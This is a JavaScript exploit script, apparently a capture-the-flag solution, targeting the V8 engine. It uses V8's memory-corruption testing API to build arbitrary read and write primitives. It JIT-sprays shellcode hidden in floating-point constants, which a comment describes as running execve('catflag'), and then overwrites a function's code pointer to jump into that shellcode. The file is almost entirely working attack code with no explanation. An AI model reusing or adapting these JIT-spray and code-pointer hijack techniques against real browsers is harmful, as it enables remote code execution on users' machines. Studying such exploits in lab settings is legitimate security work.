82 lines
2.3 KiB
JavaScript
82 lines
2.3 KiB
JavaScript
let ab = new ArrayBuffer(8);
|
|
let f64a = new Float64Array(ab, 0, 1);
|
|
let i32a = new Uint32Array(ab, 0, 2);
|
|
let si32a = new Int32Array(ab, 0, 2);
|
|
let bi64a = new BigUint64Array(ab, 0, 1);
|
|
|
|
function c2f(low, high) { // combined (two 4 bytes) word to float
|
|
i32a[0] = low;
|
|
i32a[1] = high;
|
|
return f64a[0];
|
|
}
|
|
|
|
function b2f(v) { // bigint to float
|
|
bi64a[0] = v;
|
|
return f64a[0];
|
|
}
|
|
|
|
function f2b(v) { // float to bigint
|
|
f64a[0] = v;
|
|
return bi64a[0];
|
|
}
|
|
|
|
function unptr(v) {
|
|
return v & 0xfffffffe;
|
|
}
|
|
|
|
function ptr(v) {
|
|
return v | 1;
|
|
}
|
|
|
|
function shellcode() { // Promote to ensure not GC during training
|
|
// JIT spray machine code form of `execve("catflag", NULL, NULL)`
|
|
return [
|
|
// 90 90 90 90 90 90 EB 0C
|
|
-6.82852703445671073954919833565E-229,
|
|
1.9995716422075807e-246,
|
|
1.9710255944286777e-246,
|
|
1.97118242283721e-246,
|
|
1.971136949489835e-246,
|
|
1.9711826272869888e-246,
|
|
1.9711829003383248e-246,
|
|
-9.254983612527998e+61
|
|
];
|
|
}
|
|
for (let i = 0; i < 1000000; i++) shellcode(); // Trigger TURBOFAN compilation, since we are on a old revision don't have MAGLEV
|
|
|
|
function hijack() {}
|
|
|
|
let sandbox = new Sandbox.MemoryView(0, Sandbox.byteLength);
|
|
let sandbox_i32v = new Uint32Array(sandbox, 0, 0x4000_0000);
|
|
|
|
function GetAddressOf(obj) {
|
|
return Sandbox.getAddressOf(obj);
|
|
}
|
|
|
|
// DWORD Aligned
|
|
function ArbRead32(cage_addr) { // int32 -> int32
|
|
if (cage_addr & 0x3) throw new Error("Must DWORD Aligned");
|
|
return sandbox_i32v[cage_addr >> 2];
|
|
}
|
|
|
|
// DWORD Aligned
|
|
function ArbWrite32(cage_addr, value) { // int32, int32 -> void
|
|
if (cage_addr & 0x3) throw new Error("Must DWORD Aligned");
|
|
sandbox_i32v[cage_addr >> 2] = value;
|
|
}
|
|
|
|
// %DebugPrint(shellcode);
|
|
let shellcode_addr = GetAddressOf(shellcode);
|
|
console.log("Address of shellcode: " + shellcode_addr.toString(16));
|
|
let shellcode_code_addr = unptr(ArbRead32(shellcode_addr + 0x18));
|
|
console.log("Address of shellcode.code: " + shellcode_code_addr.toString(16));
|
|
let shellcode_gadget_addr = shellcode_code_addr + 0x40 + (0x73 + 0x2);
|
|
console.log("Address of shellcode_gadget: " + shellcode_gadget_addr.toString(16));
|
|
|
|
// %DebugPrint(hijack);
|
|
let hijack_addr = GetAddressOf(hijack);
|
|
console.log("Address of hijack: " + hijack_addr.toString(16));
|
|
ArbWrite32(hijack_addr + 0x18, shellcode_gadget_addr - 0x3f);
|
|
// %SystemBreak();
|
|
|
|
hijack(); |